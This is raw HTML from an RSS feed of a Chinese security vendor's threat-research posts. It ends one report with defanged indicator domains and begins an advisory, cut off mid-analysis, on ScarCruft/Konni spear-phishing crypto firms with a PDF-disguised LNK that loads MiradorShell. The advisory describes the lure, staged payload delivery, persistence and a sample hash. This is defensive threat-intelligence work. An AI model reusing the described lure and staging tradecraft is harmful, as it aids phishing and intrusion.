YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">URL </span></span></strong></span></p><p style="letter-spacing: 0.578px;text-indent: 0em;margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">nexnxky[.]info</span></span></p><p style="letter-spacing: 0.578px;text-indent: 0em;margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">upxvion[.]info</span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;" data-pm-slice="6 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">参考</span></span></strong></span></p></div></div></div><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[1]</span><span leaf=""><a href="https://www.fortinet.com/blog/threat-research/confucius-espionage-from-stealer-to-backdoor" target="_blank">https://www.fortinet.com/blog/threat-research/confucius-espionage-from-stealer-to-backdoor</a></span></span></p></div></div></div></div></div><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="6 7 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="98507" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><div style="margin: 10px auto;text-align: center;line-height: 1.5em;"><div style="padding-bottom: 3px;display: flex;justify-content: center;align-items: center;border-bottom: 1px solid rgb(190, 25, 31);"><p data-brushtype="text" style="padding-right: 8px;padding-left: 8px;font-size: 16px;letter-spacing: 1.5px;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">团队介绍</span></strong></span></p></div></div><p style="padding-top: 4px;padding-bottom: 4px;font-size: 12px;letter-spacing: 1.5px;line-height: 1.5em;text-align: center;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">TEAM INTRODUCTION</span></span></p></div><div data-role="paragraph" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(190, 25, 31);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">360</span></span></strong><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(136, 136, 136);font-size: 14px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a69b7741&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247507824%26idx%3D1%26sn%3D3427f455307e1b5e2e1fe6001ecbb8e7">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 04 Mar 2026 17:30:00 +0800</pubDate>
    </item>
    <item>
      <title>APT-C-28（ScarCruft）利用MiradorShell发起网络攻击的安全预警</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507801&amp;idx=1&amp;sn=e169339f921fd11a2fef8dfe068e616c</link>
      <description>APT-C-28（ScarCruft），又称Konni。近期在360高级威胁研究院在日常APT组织追踪分析过程中，发现Konni组织将攻击目标扩展至加密货币行业，通过伪装成PDF的LNK文件实施鱼叉式钓鱼攻击。</description>
      <content:encoded><![CDATA[<p>原创 <span>高级威胁研究院</span> <span>2026-02-06 17:51</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=2f670903&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6CNEHNicic4PpT8CGq5Gm8yqQuibaOh9t9ooPhlicTsVkuW7vdibLeQmuBMEDiaXAjEIvcIC6VqdicAyujwANicMcqbHRw%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>APT-C-28（ScarCruft），又称Konni。近期在360高级威胁研究院在日常APT组织追踪分析过程中，发现Konni组织将攻击目标扩展至加密货币行业，通过伪装成PDF的LNK文件实施鱼叉式钓鱼攻击。</p>
  <div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="102539"><div style="margin: 10px auto;text-align: left;"><div style="background: #f2f2f2;"><div style="padding: 1em;" data-pm-slice="7 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;102539&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin: 10px auto;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background: #f2f2f2;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content:  space-between;align-items: flex-end;" hm_fix="312:231"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid rgb(190, 25, 31);"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding-right: 0em;padding-bottom: 3px;padding-left: 0em;color: rgb(50, 40, 40);margin-left: 12px;border-bottom: 1px solid rgb(190, 25, 31);font-style: italic;"><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">APT-C-28</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding-top: 4px;padding-right: 0em;padding-left: 0em;color: rgb(190, 25, 31);font-style: italic;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 18px;"><strong><span leaf="">ScarCruft</span></strong></span></span></p></div></div><div data-autoskip="1" style="text-align: justify;line-height:1.75em;letter-spacing: 1.5px;font-size:14px;color:#000;margin-top: 20px;"><p style="text-align: justify;vertical-align: inherit;color: rgb(51, 51, 51);text-indent: 28px;font-family: 等线;margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);"><span leaf="">APT-C-28（ScarCruft），又称Konni，是一个长期活跃于朝鲜半岛的APT组织，其攻击活动最早可追溯至2014年，主要针对周边国家地区的政府机构实施网络间谍活动，以窃取敏感信息为核心目标。近年来，该组织频繁被国内外安全团队追踪并披露，活动呈现持续升级势头。</span></span></span></p></div></div></div></div></div></div></div><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 一、概述 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">近期在360高级威胁研究院在日常APT组织追踪分析过程中，发现Konni组织将攻击目标扩展至加密货币行业，通过伪装成PDF的LNK文件实施鱼叉式钓鱼攻击，诱饵文档精心设计了100万至300万美元的投资金额，精准针对Web3初创公司及DeFi开发者的融资需求，既保持足够吸引力又避免引起怀疑。当用户执行文件后，会触发多阶段Payload加载，最终部署MiradorShell v2.0获取系统控制权。鉴于MiradorShell这类载荷还未完整披露过，因此本文将对这一新型攻击的完整执行过程进行技术剖析，以帮助潜在受害者及时识别威胁并采取防护措施，避免重要数据泄露和资产损失。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 二、攻击活动分析 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong style="color: rgb(190, 25, 31);font-size: 17px;letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">1. 攻击流程分析</span></span></strong></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.470314318975553" data-type="png" data-w="859" data-imgfileid="100024121" src="https://wechat2rss.xlab.app/img-proxy/?k=0cc94f08&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYQ0Dib6enOJ7Hym7lKQQGdwhPfibCCEaA2cibRf5xANbiaJn4QiaXuEwAVlw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Konni组织使用恶意压缩包进行鱼叉钓鱼，一旦用户执行压缩包中伪装成PDF的LNK文件，便会进行层层下载并解密，最终执行MiradorShell载荷，并创建计划任务，达到持有驻留的目的。需要特别说明的是，攻击者在下发最终载荷之前，会检查用户上传的信息，若信息不符合，则不会下发后续组件。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong style="color: rgb(190, 25, 31);font-size: 17px;letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">2. 恶意载体分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Konni组织在近期的定向攻击中主要使用的是恶意ZIP压缩包，以下是最近捕获到的攻击样本，其基本信息如下：</span></span></p><table style="width:573px;"><tbody><tr><td data-colwidth="117"><p><span leaf="">MD5</span></p></td><td data-colwidth="456"><p><span leaf="">ca1237bd33f61f77990d76a3df130ef5</span></p></td></tr><tr><td data-colwidth="117"><p><span leaf="">文件大小</span></p></td><td data-colwidth="456"><p><span leaf="">119.44 KB (122307 bytes)</span></p></td></tr><tr><td data-colwidth="117"><p><span leaf="">文件类型</span></p></td><td data-colwidth="456"><p><span leaf="">ZIP</span></p></td></tr></tbody></table><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">该压缩包打开后，有两个文件，一个是伪装内容，名为“Soft Commitment Letter.docx”，一个是伪装成PDF的恶意LNK文件，该文件名（“Investor Profile (Korea-based) - JiHoon Jeong”）与诱导文档名相呼应，让其用户以为这是承诺函相关附近，从而点击恶意LNK文件。</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.10982658959537572" data-type="png" data-w="865" data-imgfileid="100024122" src="https://wechat2rss.xlab.app/img-proxy/?k=9f55b1f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twY3ia02QMTqFkksDdZKae82icE5XOZkQyTmARgjhqqcxgjHUfsIUrbhc5w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">分析该LNK文件，发现文件命令部分存在混淆的CMD/Batch、C<a class="wx_topic_link" topic-id="mk6iqcey-x5iwjn" style="color: #576B95 !important;" data-topic="1">#多种语言代码</a>，如下图所示：</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.37572254335260113" data-type="png" data-w="865" data-imgfileid="100024123" src="https://wechat2rss.xlab.app/img-proxy/?k=a25f636c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYtMzRzNr9kqpUHnv1yibyhYic7f6FZ1LRTeK1oPUPm8NT45uoxZkex0dA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 